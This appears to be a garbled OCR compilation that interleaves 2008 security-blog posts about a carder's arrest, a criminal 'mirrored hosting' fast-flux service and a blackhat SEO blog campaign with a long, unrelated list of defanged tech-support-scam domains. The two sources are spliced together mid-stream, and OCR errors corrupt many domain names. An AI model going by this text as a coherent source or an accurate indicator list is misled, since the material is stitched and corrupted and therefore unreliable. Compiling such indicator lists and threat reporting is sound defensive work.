10 log 265475.txt 


[1]Customerization will inevitably prevail over the product concept mentality. 


1. http: //ddanchev. blogspot .com/2008/07/coding-spyware-and-malware-for-hire.html 
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4.10.4 Knock, Knock, Knockin’ on Carder’s Door (2008-10-02 17:59) 


This [1]video of ChaO’s bust earlier this month in Turkey, is a perfect example of what happens 
when someone starts [2]over-performing in the field of carding. 
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microsoftalert5[.Jonline 
microsoftalert6[.]Jonline 
microsoftbillingsupports[.]Jcom 
microsoftcommunication[.]com 
microsoftcompany[.]Jcom 
microsoftcustomerservicenumber[.]com 
microsoftcustomersupport-number[.]com 
microsofthelp[.]Jus 
microsofthelpandsupport[.]net 
microsofthelpcenter[. ]xyz 
microsofthelpline[.]xyz 
microsofthelpnumber[. ]co[.]uk 
microsofthelonumbers[.]com 
microsofthowto[.]com 
microsoftimedia[.]com 
microsoftliveassist[.]com 
microsoftlivesupportonlinechat[.]com 
microsoftmonitoringalerts[.]com 
microsoftoffficesupportnumber[.]com 
microsoftofficeactivation[.]Jcom 
microsoftofficehelps[.]com 
microsoftofficelivesupport[.]com 
microsoftofficesetup[.]co[.]uk 
microsoftofficesetup[.]com[.Jau 
microsoftofficesupport[.]org 
microsoftofficesupportnumber[.]com 
microsoftoutlookhelp[.]info 
microsoftoutlookhelp[.]org 
microsoftoutlooksupports[.]Jcom 
microsoftoutlooktechnicalsupportnumber[.]com 
microsoftoutlooktechsupport[.]jimdo[.Jcom 
microsoftpchelpnsupport[. ]xyz 
microsoftprofessionalsupport[.]us 
microsoftscanpage[.]com 
microsoftsecurithelpnnsupport[.]xyz 
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microsoftsecuritynotification[. ]xyz 
microsoftservice[.]website 
microsoftsupport[.]co[.]uk 
microsoftsupport[.]xyz 
microsoftsupportnumber[.]us 
microsoftsupportphonenumber|[.]com 
microsoftsupports[.]net 
microsoftsupportservices[.]com 
microsoftsupporttech[. info 
microsoftsupportus[.]com 
microsoftsystempage[.]com 
microsofttechnicalsupport[. ]net 
microsoftvirusremovalfromsystemwarning1[.]xyz 
microsoftwindows10technicalsupport[.]com 
microsoftwindows10techsupport[.]com 
microsoftwindows[. ]site 
microsoftwindowsalert[.]com 
microsoftwindowssupport[.]com 
microsoftwindowsystems[.]com 
microsoftwinsystemupdate55577767exe[.]xyz 
microwebsolution[.]net 
mikerty[.]linkarena[.Jcom 

mithail[.]ga 

mitshub[.]co[.Juk 

mitshub[.]com 

mobi-reward017[. ]site 
modadasdasdsad[. ]xyz 

monktech[.Jus 

mountainpositivefo[.]win 

mountlevel[.Jcom 

movie-tv[.]net 

movievideosupport[.]Jcom 
mozilla-firefox-support-number[.]Jcom 
mozilla-firefox[.]technicalsupportservicesinc[.]com 
mozillafirefoxhelp[.]com 
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mozillathunderbirdsupport[.]Jcom 
mparkssolutions[.]com 
mrairtech[. ]biz 
ms-account-password-reset[.]com 
ms-customer-service[.]com 
ms-help-desk[.]com 
ms-officesetup[.]tumblr[.]Jcom 
ms-phone-number[.]com 
ms-tech-support-number[.]com 
mscomperror[.]xyz 
msftbilling[.Jcom 
msn-tech-support[.]weebly[.]com 
msn[.]techbuddiesonline[.]com 
msn[.]technicalsupportcontact[.]net 
msnbilling-support[.]net 
msnbilling[.]Jcom 
msnbilling[.]weebly[.]Jcom 
msnbillingsupport[.]us 
msnbillingupdate[.]contacthelp[.]Jus 
msncustomersupportnumber[.]com 
msnhelpsupportnumber[.]com 
msnmembercenter[.]com 
msnsupportcontact[.]com 
msntechhelp[.]com 
msntechnicalhelp[.]weebly[.]Jcom 
msntechsupport[.]Jcom 
msoffice365onlinesupport[.]yolasite[.]Jcom 
msoffice-setup[.]xyz 
msoffice-setups[.]com 
msofficehelpline[.]Jcom 
msofficesetup[.]info 
msofficetechnicalsupportnumbers[.]com 
mssupportfix[.]com 
mstechsetup[.]com 


mstecsolution[.]com 
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msuschatsupport[.]Jcom 
mswinerOrr11x032417[.]club 
musickamzee[.]online 
my-apple-password[.]org 
my-apple-support[.]org 
my-appleid-password[.]org 
my-bitdefender[.]com 
my-mcafee[.]com 
my-msnsupport[.]com 
my-promo-codes[.]us 
my-routerlocal[.Jcom 
mycustomerservice[.]org 
mydigitalgeeks[.]com 
myemail-help[.]website 
myhostedaccounting[.]Jcom 
myhotmailsupport[.]co[.]uk 
mykindlesupport[.]com 
mymspc[.]com 
myobsupportaustralia[.]com[.]au 
mypccaresolutions[.]Jcom 
mypchelpclub[.Jonline 
mypchelpreview[.]online 
myremote[.Jonline 
myrimnet[.]tech 
myrokulink[.]com 
myrosoft[.]net 
myrouter-local[.Jcom 
myrouterlocall[.]net 
myrouterlocall[.]us 
myrouterlocall[.Jcom 
mysafebankerrorspot[.]com 
mysupportcontact[.]info 
mytechbay[.]us 
mywi-fi-ext[.]net 
mywifiext[.Jus 
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Try counting the desktops, and notice the "full package" a carder can dream of - the box full of 
ATM skimmers, the holograms, the plastic cards machine, the suitcase with the POS (point of 
sale) terminals, the house and swimming pool, and, of course, the hard cash. 


1. http: //www.haber7.com/video-galeri.php?vID=282 
2. http: //blog.wired.com/27bstroke6/2008/09/turkish-police.htm 
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mywifiextnetlogin[.]us 
mywifiextnetsetup[.]Jus 
mywincompl1[.]xyz 
mywincomp3[.]xyz 
mywincomp4[. ]xyz 
mywincomp6[. ]xyz 
mywincomp8sg[. ]xyz 
myyahoobookmarks[.]com 
myywifiext[. ]net 
navigonsupportnumber[.]com 
navmansupportnumber[.]com 
navteqsupportnumber[.]com 
neotechnologies[.]us 
nerdassists[.]Jcom 
netflix[.]com-phonesupport[.]Jcom 
netflixsupportnumber[.]com 
netgear [.]techbuddiesonline[.]Jcom 
netgear [.]technical-care[.]com 
netgearcustomersupport[.]us 
netgeargenie[.]us 
netgeargenieapp[.]us 
netgearlogin[.]us 
netgearparentalcontrol[.Jcom 
netgearparentalcontrol[.]info 
netgearparentalcontrol[.]net 
netgearparentalcontroll[.]us 
netgearrouterhelp[.]Jcom 
netgearrouterlogin[.]co 
netgearrouterlogin[. ]info 
netgearrouterlogin[.]us 
netgearrouterloginnet[.]com 
netgearsupport24x7[.]us 
netgearsupport[.]net 
netgearsupport[.]lorg 


netgeartech[.]support 
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netgeartollfree[.]Jus 
netgearwifiextendersetup[.]net 
netgearwirelessnroutersupport[.]Jcom 
netservicesupport[.]Jonline 
netservicesupport[.]website 
network-error-window-key-failed-occur[.]gq 
network-expert[.]co[.]uk 
network-security-crashed[.]com 
network-security-uk[.]com 
network-security[.]uk 
networkalertnetwork[.]club 
networksupportactive[.]com 
new-user-experience[.]us 
newonlinecollection[.]Jcom 
newtechnical[.]net 
newvirusinfo[.]com 
nextalert-decryptl[. info 
nindlo-swhritx[.]xyz 
nksservices[.]net 
nomatosearch[.]xyz 
nominos-videol[.]xyz 
nominos-video2[.]xyz 
nomorepopupsvirus[.]com 
norton360cs[.]tumblr[.Jcom 
norton-360-internet-security[.]com 
norton-360[. Jantivirussupportphonenumber|[.]com 
norton-antivirus-support[.]com 
norton-antivirus[.]technicalsupportservicesinc[.]Jcom 
norton-com-setup[.]Jonline 
norton-contact[.]co[.]uk 
norton-customer-care[.]com 
norton-customer-service[.]com 
norton-customerservice[.]com 
norton-help[.]co[.]uk 
norton-setup-account[.]com 
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norton-setup-activate[.]com 
norton-setup-help[.]com 
norton-setup-uk[.]Jcom 
norton-setup-usa[.]com 

norton-setup[.]Jorg 
norton-support-number[. ]co[.]uk 
norton-tech-support[.]us 

norton-usa[.]com 

norton[. Jantivirussupportaustralia[.]com 
norton[. Jantivirussupportphonenumber[.]com 
norton[.]com-setup-key[.]com 
norton[.]com-setup-noww|[.]com 
norton[.]com-setup-start[.]com 
norton[.]com-setup[.]de 
norton[.]com-setup[.]uk 
norton[.]com-setupinstall[.]com 
norton[.]com-setuponline[.]Jcom 
norton[.]klantenservicenummernederland[.]com 
norton[.]numberaustralia[.]Jcom 
norton[.]numberireland[.]com 

norton[. ]retail-isetup[.]com 
norton[.]setup-number[.]com 
norton[.]supportaustralia[.]com[.]Jau 
norton[. ]Supportnumberaustralia[.]com 
norton[.]supportnumberaustralia[.]com[.]Jau 
nortonactivation[.]website 
nortonantiviruscustomerservicel.]com 
nortonantivirustechsupportnumbers[.]com 
nortonantivirustechsupportphonenumber|[.]com 
nortoncare[.]blogspot[.]com 
nortoncom-nortonsetup[.]com 
nortoncom[.]Jorg 

nortoncomnorton[.]com 
nortoncomsetup-norton[.]com 


nortoncomsetup-nortonsetup[.]Jcom 
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nortoncomsetup[.]co 
nortoncomsetup[.]support 
nortoncustomercare[.]com 
nortoncustomercare[.]us 
nortoncustomerphonesupport[.]com 
nortoncustomerservice[.]co[.Juk 
nortoncustomerservice[.]uk 
nortonhelp[.]support/norton-tech-support 
nortonhelpcentre[.]com 
nortonhelpno[.]com 
nortonoantivirus[.]com 
nortonphonesupport[.]co[.Juk 
nortonsupport24x7[.]us 
nortonsupport[.]com[.]Jau 
nortonsupport[.]customerhelpusal[.]com 
nortonsupportaustralia[.]com 
nortonsupportaustralia[.]com[.]au 
nortonsupportcanada[.]ca 
nortonsupportcanada[.]com 
nortonsupportnumber[.]com[.]Jau 
nortonsupportphonenumber[.]com 
nortonsupportphonenumberaustralia[.]com 
nortonsupporttech[.]com 
nortontata[.]tumblr[.]Jcom 
nortontechexpert[.]Jcom 
nortontechnical-support[.]com 
nortontollfree[.Jcom 
notice-3niteO[.]stream 
notice-3scalO[.]stream 
notice-32rf2[.]stream 
notice-abw93[.]stream 
notice-aby93[.]stream 
notice-adi13[.]stream 
nrupama-viswar[.]xyz 
nstaxver-dismx[.]xyz 
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ntwrksecurityalert[.]com 
nuenorton[.]com 
nuevotech[.]biz 
number-customerservice[.]com 
number-for-apple-support[.]org 
numberaustralia[.]com 
numberireland[.]com 
numbersforsupport[.]Jcom 
oasisinfosolution[.]in 
octsale99[. info 


octsale[.]info 


odinstalujwindowsmalware[.]com 


offergoteasier99[.]info 
offergoteasier[.]info 
office365[.]numberireland[.]com 
office-account[.]Jcom 
office-com-setup[.]us 
office-setup-install[.]com 
office-setup-install[.]Jus 
office-setup-online[.]us 
office-setup[.]me 
office-support-number[. Juk 
office[.]com-install[.Jcom 
office[.]com-setup-noww[.]com 
office[.]com-setup-start[.]com 
office[.]com-setup[.]de 
office[.]com-setup[.]uk 
office[.]com-setupinstall[.]Jcom 
office[.]com-setuponline[.]Jcom 
officecom-setup[.]co 
officecom[.]org 
officecomoffice[.]com 
officecomsetup[.]co 
officecomsetup[.]co[.]uk 


officecomsetup[.]org 
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officecoordinator[.]xyz 
officehelp[.]info 
officelivesupport[.]com 
officesetup2013[.]com 
officesetup-key[.]Jcom 
officesetup-us[.]Jcom 
officesetup[.]com-install[.Jcom 
officesetupcom[.]com 
officesetupcom|[.]us 
officesetupenterprise[.]com 
officesetupi[.]Jcom 
officesupportnumber[.]Jcom 
officevetnnart[.]us 
officevetnnauto[.]us 
officevetnnbest[.]us 
officevetnnbook[.]us 
officevetnnbox[.]us 
officevetnncare[.]us 
officevetnncity[.]us 
officevetnnfit[.]us 
officevetnnguide[.]us 
officevetnnlab[.Jus 
officevetnnilife[.]us 
officevetnnmail[.Jus 
officevetnnmoney|[.]us 
officevetnnnews[.]us 
officevetnnspace[.]us 
officevetnntime[.]us 
officevetnnworld[.]us 
officevetnnzone[.]us 
okay-techsupport[.]com 
okayfixs[.]Jcom 
okayfixs[.]net 
okayfixs[.]Jus 
okaysupportpay[.]Jcom 
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okaysupportpay|[.]net 
okaytechsupport[.]org 
okaytechsupport[.]us 
oktechpay[.]Jcom 
oktechpay[.]net 
oktechpay[.]us 
oktechsupport[.]net 
olivesolution[.Jonline 
olygextech[.]net 
omtechhelpcom[.]Jcom 
onhubsupport[.]com 
online-apple-support[.]Jorg 
online-pc-supports[. Juk 
online-printer-support[. Juk 
online-support-payment[.]com 
onlineearning[.]lonline 


onlineerror-computer-security-internet[.]internet[.]Jsystems[.Jerr | or-protectd-and-main-your- 
pc-detected-the-some-systems|[.]systems[.]erro r-protectd-and-main-your-pc-detected-the- 
some-systems[.]error-protectd-and- main-your-pc-detected-the-some]1[.]pconlineweb[.]Jcom 


onlinehelpdirectory[.]com 
onlineppc[.]club 
onlineppc[.]xyz 
onlineresolve[.]com 
onlinesecurehousefive[.]com 
onlinesecurehousefour[.]com 
onlinesecurehouseone[.]com 
onlinesecurehousesix[.]com 
onlinesecurehousethree[.]com 
onlinesecurehousetwo[.]com 
onlineshopeforusa[. Jin 
onlinesolution24x7[.]com 
onlinetechmart[.]com 
onlinetechnicians[.]co 
onlinetechpay[.]Jcom 
onlinetechpayment[.]com 
opafarusadjafal[.]xyz 
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optimiserstechnologies[.]com 
optimizer365[.]net 
optolineemail[.]supportno[.Jcom 
originiftsnormall. ]xyz 

ormort[.]ga 

os-error-message[.]xyz 
os-expert-online[.]net 
os-pk54[.]stream/view 
os-support[.Jcom 
os-warning-message[.]xyz 
osactivate[.]xyz 

osisolutions[.]us 
ostechonlinesupport[.]Jcom 
ourpcdebugger[.]club 
ourpcdebugging[.]club/ 
outlook-support-number[.]com 
outlook-support-number[.]net 
outlook[.]klantenservicenederland[.]nl 
outlook[.]numberireland[.]com 
outlook[.]technicalsupportcontact[.]net 
outlookcustomerhelp[.]Jcom 
outlookcustomerservices[.]com 
outlookcustomersupport[.]Jcom 
outlookexpressemailsupport[.]com 
outlookexpresstechnicalsupport[.]com 
outlookhelp[.]Support 
outlookhelp[.]us 
outlookhelplinecontactnumber[.]com 
outlooksupport[.]email 
outlooksupport[.]net 
outlooksupportcenter[.]Jcom 
outlooksupportnumber[. ]co[.]uk 
outlooktechnicalhelp[.]com 
outlooktechnicalsupportnumbers[.]com 


outlooktechsupportnumber[.]com 
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pacbell[.]Supportno[.]Jcom 
pagehelp|[.]website 
palmtechnoitsolution[.]com 
palygames[.]xyz 


panda-antivirus-support[.]com 


panda[.]Jantivirussupportphonenumber|[.]Jcom 


pandajesupport[.]com 


pandasecurity-phone-number[.]com 


parallels-support[.]parallelshelp[.]support 


parallelshelp[.]support 
passwordhelp[.]co[.Juk 
passwordrecoverynumber[.]us 
passwordrecoverysupport[.]us 
paybesttech[.]com 
paymentonlinetech[.]com 
payokaytech[.]com 
payokaytech[. ]net 
payokaytech|[.]org 
payokaytech[.]us 
payonlinetech[.]Jcom 
payremotetech[.]com 
payremotetech[.]net 
payremotetech[.]us 
payrollquickbooks[.]net 
payrollsupportquickbooks[.]com 
paytechhelp[.]com 
paytechhelp[.]net 
paytechhelp[.]lorg 
paytechhelp[.]us 
paytrusttech[.]Jcom 
pc24experts[.]com 
pc24support[.]Jcom 
pc24techies[.]com 
pc-Otrhn3[.]stream 


pc-alert-error[.]online 
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pc-antivirus-protection[.]Jcom 
pc-antivirus[.]co[.]uk 
pc-assistance[.]co 
pc-bug[.]Jcom 
pc-buguk[.]blogspot[.]com 
pc-customer-support[.]com 
pc-error[.Jonline 
pc-expert-online[.]Jcom 
pc-failure-163p5nb[.]club 
pc-hard-drive-alert[.]us 
pc-infected-alarm[.]us 
pc-security-defender[.]info 
pc-support-number[.]Jcom 
pc-support-numbers[.]com 
pc-supports[.]uk 
pc-virus-issue[.]us 
pcaid[.]Jonline 

pcalert[.]xyz 
pcassist[.]online 
pccare247[.Jus 
pccare[.]us[.]Jcom 
pccareblog[.]blogspot[.]com 
pcdebuggingerrorinterrupt[.]club 
pcehelp[.]com 
pcexpert247[.]Jcom 
pcexpert365[.]Jcom 
pcexpertshelp[.]com 
pcfixerrors[.]net 
pcfixguides[.]com 
pcfixlabs[.]Jcom 
pcgeekgeeksquad[.]club 
pcgeeks911[.]Jcom 
pchealers247[.]com 
pchelp4office[.Jcom 
pchelpcrew[.]com 
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We're slowly entering into a stage where [1]RBN bullet proof hosting franchises are vertically 
integrating, and due to the requests from their customers are starting to offer that they 
refer to as "mirrored hosting" which in practice is plain simple fast flux network consisting of 
RBN-alike purchased netblocks, and naturally, botnet infected hosts. 


Managed fast-fluxing is only starting to go mainstream, for instance, in July | found evidence 
that [2]money mule recruiters were using ASProx’s infected hosts as hosting infrastructure, 
and in November, 2007, [3]an infamous spamming software vendor was also found to have 
been offering fast-flux services in the past. 


In this most recent fast-flux service, we have a known spammer and botnet master that 


in between self-serving himself on is way to ensure his portfolio of scammy domains remains 
online for a "little longer", is commercializing fast-fluxing and is offered a DIY service : 
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pchelpdesk24x7[.]com 
pchelpdesk247[.]net 
pchelpreviewsclub[.]Jonline 
pchelptechies[.]Jcom 
pcmethodreliablecloudcomputing[.]Jonline 
pcnetworkreliablecloudcomputing[.]online 
pcnetworkreliablecloudhosting[.Jonline 
pcnetworkreliablecloudservices[.]online 
pcnetworksteadfastcloud[.]online 
pcnetworksteadycloud[.]Jonline 
pcnetworktrustycloud[.Jonline 
pcnetworktrustytrusty[.]Jonline 
pcninza[.Jcom 

pcpatchers[.]com 

pcpatchers[. ]net 

pcpatchers[. Jtumblr[.]Jcom 
pcpatcherstechnology[.]com 
pcplanauthenticcloud[.]Jonline 
pcprotectiontips[.]Jcom 
pcrepairhelp247[.]com 

pcsafepro[.]club 

pcsafeway[.]club 
pcscan|[.]us/scan[.]php 
pcservicecompany|[.]online 
pcsoftwareengineer[.]club 
pcsteadycurrent[.Jonline 
pcsteadynow[.]online 
pcsupportfixes[.Jcom 
pcsupportnumbers[.]com 
pcsupportoffice[.]Jcom 
pcsupportpay[.]com 
pcsystemauthenticcloudservices[.]Jonline 
pcsystemreliablereliable[.]Jonline 
pctech24[.]Jcom 

pctech24[.]com[.Jau 
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pctechclinic[.]ca 

pctechclinic[.]com 

pctechsupport[.]co 
pcthreatskiller[.]Jcom 
pcthreatsremoval[.Jcom 
pctotalrepair[.Jcom 
pcworldtech[.]Jcom 

peerexperts[.]Jcom 
phone-help-desk[.]com 
phone-number-for-apple-support[. Jorg 
phone-number-help[.]co[.]uk 
phonesupporthub[.]com 
pinrest[.]space 

planetray[.]net 

plusmountainei[.]win 

plzaask[.]com 
pmversity[.]supportno[.]Jcom 
pnsninja[.]com 
pogo-customer-service-phone-number[.]com 
pogo-customer-support[.]com 
pogo-games-support[.]com 
pogo-supportcenter[.]Jcom 
pogo[.]supportnumberaustralia[.]com 
pogocustomersupportnumber[.]com 
pogocustomersupports[.]com 
pogogamessupportphonenumber[.]us 
pogosupport[.]Jonline 
pogosupportdesk[.]Jcom 
pogosupportnumber[.]com 
pogotechssupport[.]com 
pogotechsupport[.]com 
pokemongocustomerservice[.]com 
polishsys[.Jcom 

pop-helpline[.]in 
porn-virus-alert92[.]tk 
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premiumioshelp[.]Jcom 
premiumpcsupport[.]Jcom 
premiumtechsupports[.]com 
pricisionsmartsolutions[.]live 
printer-customer-service[.]com 
printer-customersupport[.]com 
printer-help-me[.]Jcom 
printer-help[.]Jco[.Juk 
printer-help[.Jorg[.]uk 
printer-help[.Juk 
printer-helpline-number[.]co[.]uk 
printer-helpnumber[.]com 
printer-helps[.]co[.]uk 
printer-phone-number[.]com 
printer-support-helps[.]Jcom 
printer-support-me[.]com 
printer-support-numberl. linfo 
printer-support-number[. ]net 
printer-support-number[.]org 
printer-support-number[.]uk 
printer-support[. ]co[.]uk 
printer-support[. Juk 
printer-technicalsupportnumber[.]com 
printer-techsupport[.]Jcom 
printer-techsupport[.]net 
printer-techsupportnumber[.]com 
printerassist[.]Jorg 
printercustomercare[.]Jcom 
printercustomernumber[.]com 
printercustomersupport[.]com 
printerhelp24x7[.]com 
printerhelp[.]Juk 
printerhelpdesk[. info 
printerhelpdesknumber[.]co[.]Juk 


printerhelpline[.]co[.]uk 
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printerhelplinenumber[.]com 
printerhelpnumber[.]co[.]uk 
printerhelpnumbers[. ]co[.]uk 
printerhelpspace[.]Jus 
printerhelpsupport[.]com 
printerhelpumber[.]us 
printeronsupport[.]Jcom 
printerrepaircentre[.]ca 
printers-driver[.]com 
printers-support-number|[.]com 
printerservicenumbers[.]com 
printershelpnumber[.]co[.]uk 
printershelps[.]com 
printerssupportnumber[.]com 
printerstechnicalsupport[.]com 
printerstechsupport[.]com 
printersupport[.]ca 
printersupportaustralia[.]com 
printersupportcal[.]Jcom 
printersupportcanada|[.]ca 
printersupporthelpline[.Jcom 
printersupportnumber[.]co[.]nz 
printersupportnumber[.]co[.]uk 
printersupportnumber[.]com 
printersupportnumbercanada[.]ca: 
printersupportnumbercanada[.]com 
printersupportphonenumber[.]com 
printersupportphonenumber[.]us 
printersupportsnumber[.]com 
printersupportweb[.]com 
printertechnicalhelp[.]com 
printertechnicalservice[.]Jcom 
printertechsupport[.]use[.]Jcom 
printertechsupportnumber[.]com 
printertechsupportnumbers[.]Jcom 
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printertollfreenumber[.]com 
printerusasupport[.]com 
printhelp99[.]club 
printtechsupport[.]com 
printwerkshop[.]Jcom 
proantivirus[.]co[.Juk 
problemdetected[.]xyz 
processorlock[.]online 
processorprocceslock[.]club 
procominfotechsolution[.]com 
procustomz[.]info 
prodeals[.]info 
producterror-303[.Jonline 
productkey[.]us 
productskeysetup[.]com 
profilecorner[.]com 
profitsclub[.]today 
progeekshelp[.]Jcom 
prokrieon5/7[.]info 
promactechnologies[.]com 
promailsupport[.]com 
promalwarekiller[.]com 
prompt-sys46[.]linfo 
prompt-sys47[.]info 
protecharena[.]com 
protechelevate[.]Jcom 
protechknowledge[.]com 
protect-your-hard-drive[.]xyz 
protection-needed[.]xyz 
prowebhelps[.]com 
qbbillingllc[.Jcom 
qbcustomerservicesllc[.]com 
qberrorsupport[.]Jcom 
quick-heal[.]Jantivirussupportphonenumber[.]com 


quickadvisor[.]net 
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quickadvisorcpa[.]com 

quickbOOks[.]Jcom 
quickbook-support-number|[.]com 
quickbook[.]Jgdn 

quickbookcustomer[.]com 
quickbooks24x7[.]com 
quickbooks-customerservice[.]com 
quickbooks-enterprise-support[.]us 
quickbooks-help[.]net 
quickbooks-online[.]co[.Juk 
quickbooks-online[.]us 

quickbooks-pro[.]net 
quickbooks-technicalsupport[.]Jcom 
quickbooks-uk[.]com 

quickbooks[.]gdn 
quickbooks[.]numberaustralia[.]com 
quickbooks[.]support-telephonenumber[.]com 
quickbooks[.]Supportnumberaustralia[.]com[.]Jau 
quickbooksaid[.]Jcom 
quickbooksbillingsupport[.]com 
quickbookscare[.]com 

quickbookscare[.]net 
quickbookscertification[.]org 
quickbookscom-support[. ]blogspot[.]com 
quickbookscontact[.]support 
quickbookscontactnumber[.]com 
quickbookscustomer[.]care 
quickbookscustomercarephonenumber[.]com 
quickbookscustomerhelp[.]com 
quickbookscustomerservice[.]com 
quickbookscustomerservicephonenumber[.]com 
quickbooksdesktop[.]com 
quickbooksdesktoppro2017[.]Jcom 
quickbookseasyhelp[.]Jcom 
quickbooksenterprise[.]support 
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quickbookserrorsupport[.]com 
quickbooksfixer[.]com 
quickbooksformacsupport[.]com 
quickbooksglobal[.Jcom 
quickbookshelp[. ]tripod[.]com 
quickbookshelplinenumber[.]com 
quickbookshelps[.]support 
quickbookshelpsupportnumber|[.]com 
quickbooksnumber[. ]Support 
quickbookspayrollservice[.]com 
quickbookspayrollsupport[.]net 
quickbooksphonenumber[.]us 
quickbookspossupport[. Jinfo 
quickbooksprofessionals[.]Jcom 
quickbookssupport[.]care 
quickbookssupport[.]guru 
quickbookssupportnumbers[.]com 
quickbookssupportphone-number[.]com 
quickbookssupports[. ]net 
quickbookssupportsnumber[.]com 
quickbookssupportusa[.]com 
quickbookstechnical[.]help 
quickbookstechnician[.]com 
quickbookstechsupportphonenumber[.]net 
quickbooksupportadvisor[.]com 
quickbooktechsupportnumber[.]Jcom 
quicken-contact-number[.]com 
quicken-customer-service[.]us 
quicken-customer-support[.]Jcom 
quicken-customer-support[.]us 
quicken-help[.]Jcom 
quicken-phone-support[.]com 
quicken-phonesupport[.]com 
quicken-software-service[.]com 


quicken-tech-support-help[.]com 
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"Finally after hardwork and great appreciation from our normal bullet proof hosting/server 
clients we are able to launch Mirrored hosting. What is Mirrored hosting ? 


Mirrored hosting is a powerful mirrored web hosting management, uses multiple Virtual 
servers to host website with 100 % uptime. Mirrored hosting is a combination of two things, 
which are: 


1. Specially Designed Virtual Servers 
2. Powerful Automated Control Panel 


How does it work ? 


Mirrored hosting uses specially configured Virtual Servers making them link with the Mir- 
rored hosting Control Panel which is then controlled by our own control panel allowing us to 
provide smooth streamline hosting with no downtime. No one is able to trace original IP of the 
server or the place where the files are hosted so the websites/domains hosted have a 100 % 
Uptime. This is achieved by unique customisation of our Virtual Servers. 


Actually, it takes ips around the world and our powerful control panel just ro- 
tates the ips every 15 minutes. though all these ips you will see will be fake no 
one can trace the orignal ip where files are hosted. Sometimes the ip is from China, 
Korea, USA, UK, Japan, Lithuania etc." 


The concept has always been there for cybercriminals to take advantage of, but once it 
matures into a managed service it would undoubtedly lower down the entry barriers allowing 
yesterday’s average phishers to take advantage of what only the "pros" were used to. 


Related posts: 

[4]Storm Worm’s Fast Flux Networks 

[5]Managed Fast Flux Provider 

[6]Fast Flux Soam and Scams Increasing 

[7]Fast Fluxing Yet Another Pharmacy Spam 

[8]Obfuscating Fast Fluxed SQL Injected Domains 

[9]Storm Worm Hosting Pharmaceutical Scams 

[10]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
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. http: //ddanchev. blogspot .com/2007/11/managed-fast-flux-provider.htm 
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4.10.6 Syndicating Google Trends Keywords for Blackhat SEO (2008-10-03 10:35) 


Several hundred [1]Windows Live Spaces and AOL Journals, are currently syndicating the 
most popular keywords provided by Google Trends, and are consequently [2]hijacking the top 
search queries exposing users to Zlob codecs. 


Here are some same bogus blogs used in the campaign, naturally pre-registered long 
before they executed it : 


vinniedigg18 .spaces.live.com 
journals.aol .com/iolatour16 
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toshibasupportphonenumber[.]com 
total-protection-pc[.]Jcom 
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tplink-cloud[.Jcom 
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tplinklogin[.]us 
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trackingfacebookfuntime[. ]club[.]s3-website-us-west-2[.]Jamazonaws [.]Jcom 
trackinggooglesearch[.]com 
trackingwebclicks[.]com 
trackmanagereight[.]com 
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trend-micro[. ]antivirussupportphonenumber[.]com 
trendmicro-technicalsupport[.]com 
trendmicro[.]Jantivirussupportcanada[.]ca 
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trop-sound-error[.]ml 
trustyconnect[.]Jcom 
trustyitsupport[.]com 
trymytools[.]Jcom 
tubotax-customer-support[.]com 
turbo-taxsupport[.]Jcom 
turbotaxcustomerservice[.]com 
tweakit[.]org[.]uk 
twitter[.]com/HuxreyOmega 
uaetechnician[.Jae 
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uksupportnumber[. ]co[.]uk 
uktechnumber[. ]co[.]uk 
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usasafeandsearches[. online 
usasafebrowsing[.]Jonline 
usasalesandservices[.Jonline 
usasupportphonenumber[.]com 
usatechnologyllc[.Jcom 
usatechsupportllc[.]com 
user-experience-now|[.]us 
ushappynewyear[.]online 
usremotesupport[.]com 
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ustechosupport[.]com 
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verizon-email[.]technicalsupportservicesinc[.]Jcom 
verizoncustomerservicel[.]us 
viableremotehelp[.]Jcom 
vicious11[.]info 
videoimagesdownload[.]Jcom 
vikash-enterprises[.]Jcom 
vikashtech[. ]biz 
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violent1 1life[.]info 
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vip-it-expert[.]com 
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vipre[.]antivirussupportphonenumber[.]com 
viptechbay[.]com 

vir[.Jus[.]Jcom 

virtuawin[.]org 
virus-alert-j5vO0p7[.]Jonline 
virus-alertthreat[.]Jcom 
virus-attack-browser-hacked-call-support[. info 
virus-protection[.]uk 
virus-relief[.]com 

virusalert[.]club 
virusattacksecurity[.Jonline 
virusfixhelp[.]com 
virusmalware[.]ml 
virusremovalprogram[.]net 
virusremovalsupport1[.]club 
virusremovalsupport4[.]club 
virusremovalsupport5[.]club 
virusremovalsupport6[. ]club 
virusremovalsupport7[.]club 
virusremovalsupport8[. ]club 
virusremovalsupport9[. ]club 
virusremovalsupport10[.]club 
virusremovalsupport11[.]club 
virusremovalsupport12[.]club 
virusremovalsupport13[.]club 
virusremovalsupport14[.]club 
virusremovalsupport15[.]club 
virusresearch[.]org 
virusspywaredesinstalacion[.]Jcom 
virusspywaredesinstallation[.]com 
virusspywareprotection[.]Jcom 
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vortexsolutions[.]net 
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fredabreak02 .spaces.live.com 
thedaalerts0O1 .spaces.live.com 
allisonpolls08 .spaces.live.com 
rheabreak18 .spaces.live.com 
racquellog17 .spaces.live.com 
monikavideo11 .spaces.live.com 
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tomekadigg26 .spaces.live.com 
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valericatch0O3 .spaces.live.com 
journals.aol .com/iolatour16 
hadleycueO1 .spaces.live.com 
journals.aol .com/staceyliving01 
collettebreak17 .spaces.live.com 
journals.aol .com/nataliablog16 
natalymore26 .spaces.live.com 


[3]A comprehensive listing of the blogs involved can be downloaded here. 
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vpcitcare[.]Jcom 
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vsupportservices[.]com 
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warningapplecloudestoragesecurityalert091[. info 
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web-security-error[.]info 
web-support[.]in 
web-techhelp[.]com 
webappsoft[.]co[.]uk 
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webest-solution[.]com 
webexpertise[.]online 
webgeekx[.]com 
webguru[.]site 


webhelpcenter24x7[.]Jcom 
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webhubunisol[.]com 
webinnovator[.]net 
webmail-login[.]online 
webmailhelps[.Jcom 
webmakerlink[.]com 
webnetworksolutions[.]com 
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webpcsfix[.]com 
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webroot-install[.]Jcom 
webroot-phone-number[.]com 
webroot[.]klantenservicenummernederland[.]com 
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webroot[.]technicalhelpdesknumber[.]com 
webrootcomsafe[. services 
webrootcustomerservice[.]com 
webrootofficial[.]Jcom 
webrootsupportphone[.]com 
webroottechsupport[.]com 
webserviceassist[.lonline 
webservicehelp[.]website 
websoftdesk[.]com 
webxsolution[.]co[.]uk 
weguardcomputers[.]Jcom 
wemotechsupport[.]com 
wesupportsolutions[.]Jcom 
wgmkr[.]xyz 
whatsapp-support-us[.]com 
wiebisdeinstallieren[.]com 
wiemanmalwaredeinstallieren[.]org 
wieumentfernenvirus[.]com 
wikihelpco[.]wordpress[.]com 
win-secure-online-assistance-error[. ]info 
